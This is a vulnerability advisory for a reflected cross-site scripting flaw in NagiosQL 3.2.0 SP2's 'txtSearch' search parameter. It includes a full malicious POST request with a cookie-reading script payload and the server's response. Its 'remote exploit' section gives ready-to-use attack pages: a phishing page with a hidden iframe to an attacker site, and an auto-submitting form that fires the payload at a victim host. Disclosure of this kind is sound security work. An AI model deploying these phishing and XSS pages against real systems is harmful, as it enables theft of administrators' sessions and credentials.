NagiosQL 3.2.0 SP2 Cross Site Scripting

`I. VULNERABILITY  
-------------------------  
Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2  
  
II. BACKGROUND  
-------------------------  
NagiosQL is a web based administration tool designed for Nagios, but might also work with forks. It helps you to easily build a complex configuration with all options, manage and use them. NagiosQL is based on a webserver with PHP, MySQL and local file or remote access to the Nagios configuration files.  
  
III. DESCRIPTION  
-------------------------  
Has been detected a Reflected XSS vulnerability in NagiosQL in all pages that containing input for search, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.  
  
The code injection is done through the parameter "txtSearch" in all pages  
  
IV. PROOF OF CONCEPT  
-------------------------  
The application does not validate the parameter “txtSearch” correctly.  
  
Malicious Request ("txtSearch")  
Vulnerable:  
POST /nagiosql/admin/hostdependencies.php HTTP/1.1  
Host: 10.0.1.120  
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate  
Referer: http://10.0.1.120/nagiosql/admin/hostdependencies.php Cookie: PHPSESSID=hhr9lv77k9d4vvh0cauco48206  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 198  
  
txtSearch=aaaa%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script%3E&modus=checkform&hidModify=&hidListId=&hidLimit=0&hidSortBy=1 &hidSortDir=ASC&hidSort=0&selModify=none&selTargetDomain=1HTTP/1.1 200 OK  
  
Date: Wed, 30 Oct 2013 16:15:34 GMT  
Server: Apache/2.2.16 (Debian)  
X-Powered-By: PHP/5.3.3-7+squeeze17  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre- check=0  
  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 3440  
Keep-Alive: timeout=15, max=100  
Connection: Keep-Alive  
Content-Type: text/htmlV.  
BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
NagiosQL test only 3.2.0 Servicepack 2  
`  
VII. SOLUTION  
-------------------------  
All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated .  
  
After click in search.  
VIII. REMOTE EXPLOIT  
-----------------------------  
Are two pages an that user access and another contains code for send via post the XSS  
  
Send phishing email For administrator for a page with follow code: Name: page.html  
  
<html>  
<body>  
<H1>BLAH BLAH BLAH</H1>  
<p>Your bases are not belong to me, dun worry bro</p>  
<? if (isset($_GET["done"])) {  
die();  
}?><iframe src="http://yoursite.com/xss/index.php" width="1" height="1" frameborder="0"></iframe>  
</body>  
</html>  
  
Name: index.php  
<html>  
<head>  
<style>  
.xss {display: none;  
}  
</style>  
</head>  
<body onload="XSS.submit();">  
<form id="xss" action="http://sitevictim/nagiosql/admin/hosts.php" method="post" name="XSS">  
<input name="txtSearch" value=""><script>alert(document.cookie);</script>"</input>  
  
</form>  
</body>  
</html>  
  
BY  
F3nr1r (William Costa)  
[email protected]  
  
  
  
  
REFERENCES  
  
  
  
http://cwe.mitre.org/data/definitions/79.html  
  
http://www.nagiosql.org/  
  
http://www.nagiosql.org/forum8/solved-issues/3270-security-hotfix-for-%20nagiosql-3-2-sp2.html#3690  
  
  
  
`